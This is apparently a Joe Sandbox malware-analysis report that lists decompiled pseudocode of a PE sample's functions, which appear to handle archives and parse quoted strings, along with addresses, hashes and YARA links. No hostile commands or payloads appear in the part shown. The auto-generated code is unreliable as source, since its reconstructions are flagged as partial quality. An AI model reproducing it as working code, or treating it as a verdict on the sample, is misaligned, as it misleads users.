							 *((intOrPtr*)(_t183 + 0x70)) =  *((intOrPtr*)(_t183 + 0x70)) +  *(_t186 - 0x14) + _t151;
							_t176 =  *(_t186 - 0x10);
							asm("adc [esi+0x74], ebx");
							_t139 =  *(_t186 - 0x14) + _t107;
							asm("adc edx, [ebp-0x18]");
							 *((intOrPtr*)(_t180 + 0x140)) = _t139 + _t151;
							asm("adc ecx, 0x0");
							 *(_t180 + 0x144) = _t176;
							_t154 =  *((intOrPtr*)(_t183 + 0x48)) -  *((intOrPtr*)(_t180 + 0x108));
							asm("sbb eax, [edi+0x10c]");
							__eflags =  *((intOrPtr*)(_t183 + 0x4c)) - _t176;
							if(__eflags > 0) {
								L18:
								_t111 =  *_t183;
								_t106 =  *((intOrPtr*)( *_t111 + 0x10))(_t111,  *(_t186 - 0x1c),  *(_t186 - 0x18), 1, 0);
								__eflags = _t106;
								if(_t106 != 0) {
									goto L17;
								}
								_t140 =  *(_t186 - 0x14);
								__eflags = _t140 - _t140;
								if(_t140 != _t140) {
									L21:
									_t106 = 0x8007000e;
									goto L17;
								}
								__eflags = _t106 -  *(_t186 - 0x10);
								if(_t106 ==  *(_t186 - 0x10)) {
									 *(_t186 - 0x24) =  *(_t186 - 0x24) & 0x00000000;
									 *(_t186 - 0x20) =  *(_t186 - 0x20) & 0x00000000;
									_push(_t140);
									 *(_t186 - 0x24) = E004031DD();
									 *(_t186 - 0x20) = _t140;
									 *(_t186 - 4) =  *(_t186 - 4) & 0x00000000;
									_t113 = E00407B3A(__eflags, _t140);
									__eflags = _t113;
									if(_t113 == 0) {
										_t158 =  *(_t186 - 0x24);
										_t178 = _t140;
										_t114 = E00418C10( *(_t186 - 0x24), _t178);
										__eflags = _t114 -  *((intOrPtr*)(_t186 + 8));
										if(_t114 !=  *((intOrPtr*)(_t186 + 8))) {
											E0040E966(_t158);
										}
										__eflags =  *((char*)(_t180 + 0x14c));
										if( *((char*)(_t180 + 0x14c)) == 0) {
											 *((char*)(_t180 + 0x149)) = 1;
										}
										 *(_t186 - 0x28) =  *(_t186 - 0x28) & 0x00000000;
										 *(_t186 - 0x27) =  *(_t186 - 0x27) & 0x00000000;
										 *(_t186 - 4) = 1;
										E0040E8FC(_t183, _t186 - 0x24);
										 *((intOrPtr*)(_t186 - 0x38)) = 0;
										 *(_t186 - 0x34) = 0;
										 *((intOrPtr*)(_t186 - 0x30)) = 0;
										_t160 =  *((intOrPtr*)(_t183 + 0x38));
										 *(_t186 - 4) = 2;
										_t117 = E0040EA46( *((intOrPtr*)(_t183 + 0x38)));
										__eflags = _t117 - 1;
										if(_t117 != 1) {
											L30:
											__eflags = _t117 - 0x17;
											if(_t117 != 0x17) {
												L32:
												E0040E966(_t160);
												L33:
												_t161 = _t183;
												_t121 = E0040FE8A(_t183, _t178, __eflags,  *((intOrPtr*)(_t180 + 0x108)),  *((intOrPtr*)(_t180 + 0x10c)), _t180 + 0x118, _t186 - 0x38); // executed
												__eflags = _t121;
												if(_t121 != 0) {
													goto L42;
												}
												__eflags =  *(_t186 - 0x34);
												if( *(_t186 - 0x34) != 0) {
													__eflags =  *(_t186 - 0x34) - 1;
													if( *(_t186 - 0x34) > 1) {
														E0040E966(_t161);
													}
													E0040E883(_t186 - 0x2c);
													E0040E8FC(_t183,  *((intOrPtr*)( *((intOrPtr*)(_t186 - 0x38)))));
													_t167 =  *((intOrPtr*)(_t183 + 0x38));
													_t127 = E0040EA46( *((intOrPtr*)(_t183 + 0x38)));
													__eflags = _t127 - 1;
													if(_t127 != 1) {
														L40:
														E0040E966(_t167);
														goto L41;
													}
													__eflags = _t178;
													if(__eflags == 0) {
														goto L41;
													}
													goto L40;
												}
												_t185 = 0;
												goto L43;
											}
											__eflags = _t178;
											if(__eflags == 0) {
												goto L33;
											}
											goto L32;
										} else {
											__eflags = _t178;
											if(__eflags == 0) {
												L41:
												 *(_t180 + 0x148) = 1;
												 *((intOrPtr*)(_t180 + 0x138)) =  *((intOrPtr*)(_t183 + 0x70));
												 *((intOrPtr*)(_t180 + 0x13c)) =  *((intOrPtr*)(_t183 + 0x74));
												_t121 = E00410138(_t183, _t178, __eflags, _t180);
												L42:
												_t185 = _t121;
												L43:
												 *(_t186 - 4) = 1;
												E00410DA8(0, _t186 - 0x38);
												_t96 = _t186 - 4;
												 *_t96 =  *(_t186 - 4) & 0x00000000;
												__eflags =  *_t96;
												_t113 = E0040E883(_t186 - 0x2c);
												L44:
												E00403204(_t113,  *(_t186 - 0x24));
												_t106 = _t185;
												goto L17;
											}
											goto L30;
										}
									}
									_t185 = _t113;
									goto L44;
								}
								goto L21;
							} else {
								if(__eflags < 0) {
									L15:
									 *((char*)(_t180 + 0x14b)) = 1;
									goto L16;
								}
								__eflags = _t154 - _t139;
								if(_t154 >= _t139) {
									goto L18;
								}
								goto L15;
							}
						}
						if((_t107 |  *(_t186 - 0x18)) != 0) {
							goto L16;
						}
						 *(_t180 + 0x148) = 1;
						_t106 = 0;
						goto L17;
					}
				}
			}

0x00410869
0x00410874
0x00410877
0x0041087b
0x00410883
0x0041088c
0x00410895
0x0041089b
0x004108a3
0x004108a9
0x0041099e
0x004109a0
0x004109a1
0x004109a7
0x004109af
0x004109af
0x004108b5
0x004108bb
0x004108c4
0x004108c7
0x004108cf
0x004108d2
0x004108d3
0x004108d8
0x004108de
0x004108e1
0x004108e9
0x004108ef
0x004108f5
0x004108f8
0x004108fe
0x00000000
0x0041090e
0x0041090e
0x00410915
0x00000000
0x00410922
0x00410928
0x0041093a
0x00410941
0x00410943
0x00410943
0x00410952
0x00410955
0x00410958
0x0041095b
0x00410961
0x00410963
0x0041096c
0x00410972
0x00410975
0x0041097e
0x00410987
0x0041098d
0x0041098f
0x004109b2
0x004109b2
0x004109c1
0x004109c4
0x004109c6
0x00000000
0x00000000
0x004109c8
0x004109cb
0x004109cd
0x004109d4
0x004109d4
0x00000000
0x004109d4
0x004109cf
0x004109d2
0x004109db
0x004109df
0x004109e3
0x004109ea
0x004109ed
0x004109f2
0x004109f9
0x004109fe
0x00410a00
0x00410a09
0x00410a0c
0x00410a0e
0x00410a13
0x00410a16
0x00410a18
0x00410a18
0x00410a1d
0x00410a24
0x00410a26
0x00410a26
0x00410a2d
0x00410a31
0x00410a3d
0x00410a41
0x00410a48
0x00410a4b
0x00410a4e
0x00410a51
0x00410a54
0x00410a58
0x00410a5d
0x00410a60
0x00410a66
0x00410a66
0x00410a69
0x00410a6f
0x00410a6f
0x00410a74
0x00410a77
0x00410a8d
0x00410a92
0x00410a94
0x00000000
0x00000000
0x00410a96
0x00410a99
0x00410a9f
0x00410aa3
0x00410aa5
0x00410aa5
0x00410aad
0x00410abb
0x00410ac0
0x00410ac3
0x00410ac8
0x00410acb
0x00410ad1
0x00410ad1
0x00000000
0x00410ad1
0x00410acd
0x00410acf
0x00000000
0x00000000
0x00000000
0x00410acf
0x00410a9b
0x00000000
0x00410a9b
0x00410a6b
0x00410a6d
0x00000000
0x00000000
0x00000000
0x00410a62
0x00410a62
0x00410a64
0x00410ad6
0x00410ad6
0x00410ae0
0x00410aec
0x00410af2
0x00410af7
0x00410af7
0x00410af9
0x00410afc
0x00410b00
0x00410b05
0x00410b05
0x00410b05
0x00410b0c
0x00410b11
0x00410b14
0x00410b1a
0x00000000
0x00410b1a
0x00000000
0x00410a64
0x00410a60
0x00410a02
0x00000000
0x00410a02
0x00000000
0x00410991
0x00410991
0x00410997
0x00410997
0x00000000
0x00410997
0x00410993
0x00410995
0x00000000
0x00000000
0x00000000
0x00410995
0x0041098f
0x0041092d
0x00000000
0x00000000
0x0041092f
0x00410936
0x00000000
0x00410936
0x00410915

APIs

__EH_prolog.LIBCMT ref: 00410869

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 629039187cee0bc8d250b5563ab5e0071ef84874249a4d4adb71f335476c5ecd
Instruction ID: 45b12642a324e08f911b4fbefe6149a1cb9296f609db2837831a0bfb9efd5dc6
Opcode Fuzzy Hash: 629039187cee0bc8d250b5563ab5e0071ef84874249a4d4adb71f335476c5ecd
Instruction Fuzzy Hash: 34917DB0A007459BDB24DBA5C4907EEFBF1BF59314F14452EE489A3352C7B869C0CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2C8, Relevance: 1.7, APIs: 1, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040A2C8(intOrPtr* __ecx) {
				signed int _t58;
				signed int _t59;
				signed int _t60;
				intOrPtr* _t61;
				intOrPtr* _t63;
				signed int _t81;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				signed int* _t97;
				intOrPtr _t115;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t132;
				void* _t133;
				signed int* _t139;
				intOrPtr* _t142;
				signed int _t144;
				intOrPtr _t145;
				void* _t147;

				E00418D80(E00419E04, _t147);
				_t142 = __ecx;
				_t58 = E00409DAD(__ecx,  *((intOrPtr*)(_t147 + 8))); // executed
				if(_t58 != 0) {
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
					return _t58;
				}
				if( *__ecx == _t58) {
					L21:
					_t58 = 0;
					goto L22;
				}
				_t59 =  *(__ecx + 8);
				_t97 = __ecx + 8;
				if(_t59 != 0) {
					 *((intOrPtr*)( *_t59 + 8))(_t59);
					 *_t97 =  *_t97 & 0x00000000;
				}
				_t60 =  *(_t142 + 0xc);
				_t139 = _t142 + 0xc;
				if(_t60 != 0) {
					 *((intOrPtr*)( *_t60 + 8))(_t60);
					 *_t139 =  *_t139 & 0x00000000;
				}
				_t61 =  *_t142;
				 *((intOrPtr*)( *_t61))(_t61, 0x41b1e0, _t97);
				_t63 =  *_t142;
				 *((intOrPtr*)( *_t63))(_t63, 0x41b1d0, _t139);
				_push(_t142 + 0xd9);
				_t128 = 0x42;
				_t58 = E0040A4E3( *_t142, _t128);
				if(_t58 != 0) {
					goto L22;
				} else {
					_push(_t142 + 0xdb);
					_t129 = 0x41;
					_t58 = E0040A4E3( *_t142, _t129);
					if(_t58 != 0) {
						goto L22;
					}
					_push(_t142 + 0xdc);
					_t130 = 0x3f;
					_t58 = E0040A4E3( *_t142, _t130);
					if(_t58 != 0) {
						goto L22;
					}
					_push(_t142 + 0xdd);
					_t131 = 0x40;
					_t58 = E0040A4E3( *_t142, _t131);
					if(_t58 != 0) {
						goto L22;
					}
					_push(_t142 + 0xde);
					_t132 = 0x5b;
					_t58 = E0040A4E3( *_t142, _t132);
					if(_t58 != 0) {
						goto L22;
					}
					_push(_t142 + 0xda);
					_t133 = 0x5d;
					_t58 = E0040A4E3( *_t142, _t133);
					if(_t58 != 0) {
						goto L22;
					}
					E0040429A(_t142 + 0x70);
					 *((intOrPtr*)(_t147 - 4)) = 0;
					E0040368D(_t147 - 0x24);
					 *((char*)(_t147 - 4)) = 1;
					if(E00403A5B(_t147 - 0x18, 0x2e) >= 0) {
						E0040376E(_t147 - 0x24,  *((intOrPtr*)(_t147 - 0x18)) + 2 + _t73 * 2);
					}
					_t74 =  *((intOrPtr*)(_t142 + 0x88));
					_t140 = _t142 + 0x88;
					 *((intOrPtr*)(_t142 + 0x8c)) = 0;
					 *((short*)( *((intOrPtr*)(_t142 + 0x88)))) = 0;
					_t144 =  *(_t142 + 0x94);
					if(_t144 >= 0) {
						_t145 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t147 + 8)))) + 8)) + _t144 * 4));
						if( *((intOrPtr*)(_t145 + 0x1c)) != 0) {
							_t81 = E00409144(_t145, _t147 - 0x24);
							if(_t81 < 0) {
								_t81 = 0;
							}
							_t115 =  *((intOrPtr*)(_t145 + 0x18));
							_t49 =  *((intOrPtr*)(_t115 + _t81 * 4)) + 0xc; // 0xc
							_push( *((intOrPtr*)(_t115 + _t81 * 4)));
							_t83 = E00408FCD(_t147 - 0x48, _t147 - 0x18);
							 *((char*)(_t147 - 4)) = 5;
							_t74 = E00403204(E004037D2(_t140, _t83),  *((intOrPtr*)(_t147 - 0x48)));
						} else {
							_t85 = E0040368D(_t147 - 0x48);
							 *((char*)(_t147 - 4)) = 2;
							_t86 = E0040368D(_t147 - 0x3c);
							_push(_t85);
							_push(_t86);
							 *((char*)(_t147 - 4)) = 3;
							_t87 = E00408FCD(_t147 - 0x30, _t147 - 0x18);
							 *((char*)(_t147 - 4)) = 4;
							_t74 = E00403204(E00403204(E00403204(E004037D2(_t140, _t87),  *((intOrPtr*)(_t147 - 0x30))),  *((intOrPtr*)(_t147 - 0x3c))),  *((intOrPtr*)(_t147 - 0x48)));
						}
					}
					E00403204(E00403204(_t74,  *((intOrPtr*)(_t147 - 0x24))),  *((intOrPtr*)(_t147 - 0x18)));
					goto L21;
				}
			}

0x0040a2cd
0x0040a2d8
0x0040a2dd
0x0040a2e4
0x0040a4d2
0x0040a4d8
0x0040a4e0
0x0040a4e0
0x0040a2ec
0x0040a4d0
0x0040a4d0
0x00000000
0x0040a4d0
0x0040a2f2
0x0040a2f5
0x0040a2fa
0x0040a2ff
0x0040a302
0x0040a302
0x0040a305
0x0040a308
0x0040a30d
0x0040a312
0x0040a315
0x0040a315
0x0040a318
0x0040a323
0x0040a325
0x0040a330
0x0040a33a
0x0040a33d
0x0040a33e
0x0040a347
0x00000000
0x0040a34d
0x0040a355
0x0040a358
0x0040a359
0x0040a360
0x00000000
0x00000000
0x0040a36e
0x0040a371
0x0040a372
0x0040a379
0x00000000
0x00000000
0x0040a387
0x0040a38a
0x0040a38b
0x0040a392
0x00000000
0x00000000
0x0040a3a0
0x0040a3a3
0x0040a3a4
0x0040a3ab
0x00000000
0x00000000
0x0040a3b9
0x0040a3bc
0x0040a3bd
0x0040a3c4
0x00000000
0x00000000
0x0040a3d0
0x0040a3d8
0x0040a3db
0x0040a3e5
0x0040a3f0
0x0040a3fd
0x0040a3fd
0x0040a402
0x0040a408
0x0040a40e
0x0040a411
0x0040a414
0x0040a41c
0x0040a42a
0x0040a430
0x0040a488
0x0040a48f
0x0040a491
0x0040a491
0x0040a493
0x0040a49c
0x0040a4a0
0x0040a4a4
0x0040a4ac
0x0040a4b8
0x0040a432
0x0040a435
0x0040a43f
0x0040a443
0x0040a448
0x0040a449
0x0040a450
0x0040a454
0x0040a45c
0x0040a478
0x0040a47d
0x0040a430
0x0040a4c9
0x00000000
0x0040a4cf

APIs

__EH_prolog.LIBCMT ref: 0040A2CD

Part of subcall function 00409DAD: __EH_prolog.LIBCMT ref: 00409DB2

Part of subcall function 00408FCD: __EH_prolog.LIBCMT ref: 00408FD2

Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$free
String ID:
API String ID: 2654054672-0
Opcode ID: 55abee7260f8abe240855f7b25643b941ebcc1b184b95c31af575d9cb9fe0adf
Instruction ID: 9e12673def2b6459cc981bd691141fc0cb4a79b6ab5f4124fe6ffa379ca14ef1
Opcode Fuzzy Hash: 55abee7260f8abe240855f7b25643b941ebcc1b184b95c31af575d9cb9fe0adf
Instruction Fuzzy Hash: 6A618375600205AFCB20EF61C885EAEBBB8EF44308F10447FE545B72D1DAB8AD55CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00403C57, Relevance: 1.7, APIs: 1, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00403C57(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* _t70;
				signed int _t71;
				intOrPtr _t86;
				signed int _t87;
				char _t97;
				char _t115;
				void* _t135;
				intOrPtr* _t138;
				void* _t140;

				E00418D80(E0041986C, _t140);
				_t135 = __edx;
				_t138 = __ecx;
				E00404015(__edx);
				 *(_t140 - 0x10) =  *(_t140 - 0x10) & 0x00000000;
				while(1) {
					L1:
					_t70 = E00403EC8(_t138, _t140 - 0x10);
					_t149 = _t70;
					if(_t70 == 0) {
						break;
					}
					E0040368D(_t140 - 0x48);
					 *(_t140 - 4) =  *(_t140 - 4) & 0x00000000;
					E0040368D(_t140 - 0x3c);
					_push(_t140 - 0x18);
					 *(_t140 - 4) = 1;
					E00403E47(_t140 - 0x30,  *_t138 +  *(_t140 - 0x10), _t149);
					 *(_t140 - 4) = 2;
					if(E00404045(_t140 - 0x30, _t140 - 0x48) == 0) {
						L26:
						E00403204(E00403204(E00403204(_t76,  *((intOrPtr*)(_t140 - 0x30))),  *((intOrPtr*)(_t140 - 0x3c))),  *((intOrPtr*)(_t140 - 0x48)));
						goto L29;
					} else {
						_t76 =  *((intOrPtr*)(_t140 - 0x18));
						if(_t76 == 0) {
							goto L26;
						} else {
							 *(_t140 - 0x10) =  *(_t140 - 0x10) + _t76;
							if(E00403EC8(_t138, _t140 - 0x10) == 0) {
								goto L26;
							} else {
								_t76 =  *_t138;
								if( *((char*)( *_t138 +  *(_t140 - 0x10))) != 0x3d) {
									goto L26;
								} else {
									 *(_t140 - 0x10) =  *(_t140 - 0x10) + 1;
									if(E00403EC8(_t138, _t140 - 0x10) == 0) {
										goto L26;
									} else {
										_t76 =  *_t138;
										if( *((char*)( *_t138 +  *(_t140 - 0x10))) != 0x22) {
											goto L26;
										} else {
											 *(_t140 - 0x10) =  *(_t140 - 0x10) + 1;
											E004033AD(_t140 - 0x24);
											 *(_t140 - 4) = 3;
											while(1) {
												_t81 =  *((intOrPtr*)(_t138 + 4));
												if( *(_t140 - 0x10) >=  *((intOrPtr*)(_t138 + 4))) {
													break;
												}
												_t86 =  *_t138;
												_t115 =  *((intOrPtr*)(_t86 +  *(_t140 - 0x10)));
												 *(_t140 - 0x10) =  *(_t140 - 0x10) + 1;
												 *((char*)(_t140 - 0x14)) = _t115;
												if(_t115 == 0x22) {
													_t87 = E00404045(_t140 - 0x24, _t140 - 0x3c); // executed
													__eflags = _t87;
													if(_t87 == 0) {
														E00403204(E00403204(_t87,  *((intOrPtr*)(_t140 - 0x24))),  *((intOrPtr*)(_t140 - 0x30)));
														_t63 = _t140 - 4;
														 *_t63 =  *(_t140 - 4) | 0xffffffff;
														__eflags =  *_t63;
														E00401D5B(_t140 - 0x48);
														L29:
														_t71 = 0;
														__eflags = 0;
													} else {
														_push(_t140 - 0x48);
														E00403204(E00403204(E00403FB4(_t135, _t135),  *((intOrPtr*)(_t140 - 0x24))),  *((intOrPtr*)(_t140 - 0x30)));
														 *(_t140 - 4) =  *(_t140 - 4) | 0xffffffff;
														E00401D5B(_t140 - 0x48);
														goto L1;
													}
												} else {
													if(_t115 != 0x5c) {
														L17:
														_push( *((intOrPtr*)(_t140 - 0x14)));
													} else {
														_t97 =  *((intOrPtr*)(_t86 +  *(_t140 - 0x10)));
														 *(_t140 - 0x10) =  *(_t140 - 0x10) + 1;
														 *((char*)(_t140 - 0x14)) = _t97;
														if(_t97 == 0x22) {
															_push(0x22);
														} else {
															if(_t97 == 0x5c) {
																_push(0x5c);
															} else {
																if(_t97 == 0x6e) {
																	_push(0xa);
																} else {
																	if(_t97 == 0x74) {
																		_push(9);
																	} else {
																		E00401B7E(_t140 - 0x24, 0x5c);
																		goto L17;
																	}
																}
															}
														}
													}
													E00401B7E(_t140 - 0x24);
													continue;
												}
												goto L30;
											}
											E00403204(E00403204(E00403204(E00403204(_t81,  *((intOrPtr*)(_t140 - 0x24))),  *((intOrPtr*)(_t140 - 0x30))),  *((intOrPtr*)(_t140 - 0x3c))),  *((intOrPtr*)(_t140 - 0x48)));
											goto L29;
										}
									}
								}
							}
						}
					}
					L30:
					 *[fs:0x0] =  *((intOrPtr*)(_t140 - 0xc));
					return _t71;
				}
				_t71 = 1;
				goto L30;
			}

0x00403c5c
0x00403c66
0x00403c68
0x00403c6c
0x00403c71
0x00403c75
0x00403c75
0x00403c7a
0x00403c7f
0x00403c81
0x00000000
0x00000000
0x00403c8a
0x00403c8f
0x00403c96
0x00403ca0
0x00403ca4
0x00403cb1
0x00403cbc
0x00403cc7
0x00403dd7
0x00403dea
0x00000000
0x00403ccd
0x00403ccd
0x00403cd2
0x00000000
0x00403cd8
0x00403cd8
0x00403ce7
0x00000000
0x00403ced
0x00403ced
0x00403cf6
0x00000000
0x00403cfc
0x00403cfc
0x00403d0b
0x00000000
0x00403d11
0x00403d11
0x00403d1a
0x00000000
0x00403d20
0x00403d20
0x00403d26
0x00403d2b
0x00403d2f
0x00403d2f
0x00403d35
0x00000000
0x00000000
0x00403d3b
0x00403d40
0x00403d43
0x00403d49
0x00403d4c
0x00403d9c
0x00403da1
0x00403da3
0x00403e24
0x00403e29
0x00403e29
0x00403e29
0x00403e32
0x00403e37
0x00403e37
0x00403e37
0x00403da5
0x00403daa
0x00403dbb
0x00403dc0
0x00403dc9
0x00000000
0x00403dc9
0x00403d4e
0x00403d51
0x00403d79
0x00403d79
0x00403d53
0x00403d56
0x00403d59
0x00403d5e
0x00403d61
0x00403d8a
0x00403d63
0x00403d65
0x00403d86
0x00403d67
0x00403d69
0x00403d82
0x00403d6b
0x00403d6d
0x00403d7e
0x00403d6f
0x00403d74
0x00000000
0x00403d74
0x00403d6d
0x00403d69
0x00403d65
0x00403d61
0x00403d8f
0x00000000
0x00403d8f
0x00000000
0x00403d4c
0x00403e0f
0x00000000
0x00403e14
0x00403d1a
0x00403d0b
0x00403cf6
0x00403ce7
0x00403cd2
0x00403e39
0x00403e3e
0x00403e46
0x00403e46
0x00403dd3
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00403C5C

Part of subcall function 00403E47: __EH_prolog.LIBCMT ref: 00403E4C

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d2a7fd05f4e654ad9fe7b940c788f01605561fd51e25167466035038761d5728
Instruction ID: 62711b22f829848c6225802ca1be1f26c4d3f143e04fa4970c83603acd48c4fb
Opcode Fuzzy Hash: d2a7fd05f4e654ad9fe7b940c788f01605561fd51e25167466035038761d5728
Instruction Fuzzy Hash: AE516F30900209AACF15EF95C841AEEBF79AF5130AF1445AFE551372E2DB391F0ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFA7, Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040AFA7(signed int __ecx) {
				intOrPtr _t66;
				intOrPtr* _t72;
				intOrPtr* _t76;
				void* _t81;
				intOrPtr _t83;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t124;
				intOrPtr* _t127;
				void* _t129;

				E00418D80(E00419F32, _t129);
				_t124 = __ecx;
				_push(0x98);
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				_t66 = E004031DD();
				 *((intOrPtr*)(_t129 - 0x10)) = _t66;
				 *(_t129 - 4) = 0;
				if(_t66 == 0) {
					_t127 = 0;
					__eflags = 0;
				} else {
					_t127 = E0040B121(_t66);
				}
				 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t129 - 0x10)) = _t127;
				if(_t127 != 0) {
					 *((intOrPtr*)( *_t127 + 4))(_t127);
				}
				 *(_t129 - 4) = 1;
				 *((intOrPtr*)(_t127 + 0x90)) =  *((intOrPtr*)(_t129 + 0xc));
				E0040368D(_t129 - 0x1c);
				 *(_t129 - 4) = 2;
				E0040368D(_t129 - 0x28);
				_t98 =  *((intOrPtr*)(_t129 + 8));
				 *(_t129 - 4) = 3;
				if( *((intOrPtr*)(_t98 + 0x30)) != 0) {
					L8:
					_t26 = _t127 + 8; // 0x8
					 *((intOrPtr*)( *((intOrPtr*)(_t127 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t98 + 0x44)));
				} else {
					_t137 =  *((char*)(_t98 + 0x40));
					if( *((char*)(_t98 + 0x40)) != 0) {
						goto L8;
					} else {
						E0040488C( *((intOrPtr*)(_t98 + 0x44)), _t129 - 0x1c, _t137, _t129 - 0x28);
						E0040B290(_t127, _t137, _t129 - 0x1c, _t129 - 0x28); // executed
					}
				}
				 *((intOrPtr*)(_t98 + 0x38)) = _t127;
				 *((intOrPtr*)(_t98 + 0x3c)) = _t127;
				_t72 = E0040A90A(_t124, _t137, _t98); // executed
				_t99 = _t72;
				_t73 =  *((intOrPtr*)(_t127 + 0x8c));
				 *((char*)(_t124 + 0x21)) =  *((intOrPtr*)(_t127 + 0x8c));
				if(_t99 == 0) {
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t127 + 0x78));
					if( *((intOrPtr*)(_t127 + 0x78)) > 0) {
						do {
							_t73 =  *((intOrPtr*)(_t127 + 0x74));
							__eflags =  *((char*)(_t73 + _t100));
							if( *((char*)(_t73 + _t100)) != 0) {
								_push(E00403632(_t129 - 0x34, _t129 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x68)) + _t100 * 4))));
								 *(_t129 - 4) = 4;
								_t81 = E00403089(_t124 + 0xc);
								 *(_t129 - 4) = 3;
								E00403204(_t81,  *((intOrPtr*)(_t129 - 0x34)));
								_t83 =  *((intOrPtr*)(_t127 + 0x80));
								_t73 =  *((intOrPtr*)(_t83 + 4 + _t100 * 8));
								 *((intOrPtr*)(_t124 + 0x18)) =  *((intOrPtr*)(_t124 + 0x18)) +  *((intOrPtr*)(_t83 + _t100 * 8));
								asm("adc [edi+0x1c], eax");
							}
							_t100 = _t100 + 1;
							__eflags = _t100 -  *((intOrPtr*)(_t127 + 0x78));
						} while (_t100 <  *((intOrPtr*)(_t127 + 0x78)));
					}
					E00403204(E00403204(_t73,  *((intOrPtr*)(_t129 - 0x28))),  *((intOrPtr*)(_t129 - 0x1c)));
					 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
					__eflags = _t127;
					if(_t127 != 0) {
						 *((intOrPtr*)( *_t127 + 8))(_t127);
					}
					_t76 = 0;
					__eflags = 0;
				} else {
					E00403204(E00403204(_t73,  *((intOrPtr*)(_t129 - 0x28))),  *((intOrPtr*)(_t129 - 0x1c)));
					 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
					if(_t127 != 0) {
						 *((intOrPtr*)( *_t127 + 8))(_t127);
					}
					_t76 = _t99;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t129 - 0xc));
				return _t76;
			}

0x0040afac
0x0040afb7
0x0040afbb
0x0040afc0
0x0040afc3
0x0040afc6
0x0040afcc
0x0040afd1
0x0040afd4
0x0040afe1
0x0040afe1
0x0040afd6
0x0040afdd
0x0040afdd
0x0040afe3
0x0040afe9
0x0040afec
0x0040aff1
0x0040aff1
0x0040affa
0x0040b001
0x0040b007
0x0040b00f
0x0040b013
0x0040b018
0x0040b01b
0x0040b023
0x0040b04b
0x0040b051
0x0040b056
0x0040b025
0x0040b025
0x0040b029
0x00000000
0x0040b02b
0x0040b035
0x0040b044
0x0040b044
0x0040b029
0x0040b05c
0x0040b05f
0x0040b062
0x0040b067
0x0040b069
0x0040b071
0x0040b074
0x0040b09a
0x0040b09c
0x0040b09f
0x0040b0a1
0x0040b0a1
0x0040b0a4
0x0040b0a8
0x0040b0bb
0x0040b0bf
0x0040b0c3
0x0040b0cb
0x0040b0cf
0x0040b0d4
0x0040b0de
0x0040b0e2
0x0040b0e5
0x0040b0e5
0x0040b0e8
0x0040b0e9
0x0040b0e9
0x0040b0a1
0x0040b0f9
0x0040b0fe
0x0040b103
0x0040b106
0x0040b10b
0x0040b10b
0x0040b10e
0x0040b10e
0x0040b076
0x0040b081
0x0040b086
0x0040b08e
0x0040b093
0x0040b093
0x0040b096
0x0040b096
0x0040b116
0x0040b11e

APIs

__EH_prolog.LIBCMT ref: 0040AFAC

Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD

Part of subcall function 0040B121: __EH_prolog.LIBCMT ref: 0040B126

Part of subcall function 00403089: __EH_prolog.LIBCMT ref: 0040308E

